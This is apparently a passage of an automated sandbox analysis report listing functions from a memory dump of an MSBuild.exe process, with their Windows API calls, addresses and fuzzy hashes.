Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5

Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(?,00000000), ref: 00404453
FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID:
API String ID: 3150196962-0
Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69

Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004152D6

Strings

failed to allocate %u bytes of memory, xrefs: 004152F0

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9

Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041BDDF
memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99

Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0

GetStdHandle.KERNEL32(000000F5), ref: 00410530
CloseHandle.KERNELBASE(?), ref: 00410654

Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
String ID:
API String ID: 1381354015-0
Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59

Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418D55
memset.MSVCRT ref: 00418D6C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98

Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004301AD
memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98

Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040B1AE
free.MSVCRT ref: 0040B1B6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08

Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55

Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 2154303073-0
Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95

Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(?,00000000), ref: 0041362A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID:
API String ID: 3150196962-0
Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC

Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25

Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588

Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59

Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54

Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305

Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55

Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94

Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC

Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524

Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524

Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518

Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28

Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A

Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?), ref: 0044DEB6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D

Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04

Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17

Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00

Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA

Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004095FC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
String ID:
API String ID: 3655998216-0
Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
